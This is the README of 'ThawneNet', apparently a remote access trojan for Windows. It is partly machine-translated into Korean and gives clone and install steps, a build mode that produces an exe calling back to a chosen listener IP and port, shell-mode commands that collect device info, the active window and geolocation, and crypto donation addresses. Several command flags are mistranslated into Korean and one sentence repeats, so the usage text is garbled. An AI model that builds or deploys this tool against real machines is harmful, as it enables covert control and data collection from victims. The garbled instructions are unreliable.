ThawneNet
1.0.0
Thawnenet은 Windows 시스템을 원격으로 제어하고 정보를 검색하도록 설계된 도구입니다. Thawnenet은 클라이언트 측의 Python Windows에서 개발 된 클라이언트/서버 응용 프로그램이며 서버는 Python에도 있습니다.

Thawnenet은 Python3을 필요로합니다
git clone https://github.com/cisamu123/ThawneNet.git
cd ThawneNET
pip install -r requirements.txt
```.
### Available Modes
* `--build` - for building the exe
* `--shell` - getting an interactive shell of the device
build 모드사용법 : python3 server.py -빌드
shell 모드사용법 : python3 server.py -쉘 [플래그] 플래그 : -i, -ip listner ip 주소 -p, -포트 리스너 포트 번호
shell 모드를 실행하면 장치의 통역사가 표시됩니다.
통역사에서 실행할 수있는 명령
info --> returns basic info of the device
activeWindow --> returns active window
battery --> returns battery info
whois --> returns the ip, city, country etc of the device
clear --> clears the screen
exit --> exit the interpreter
원하는 IP 및 포트를 사용하여 EXE를 구축하려면 : python3 server.py --build
통역사를 얻으려면 : python3 server.py --shell -i 0.0.0.0 -p 8000

BTC : bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH : 0x8d797249170d263B959A3c688D8456adBcfBC319
XMRT : 0xF978FE35d00A201eB48aB3908993e14f312001a2
Thawnenet은 MIT 라이센스에 따라 라이센스에 따라 라이센스를 살펴보십시오. 자세한 내용은 라이센스를 살펴보십시오.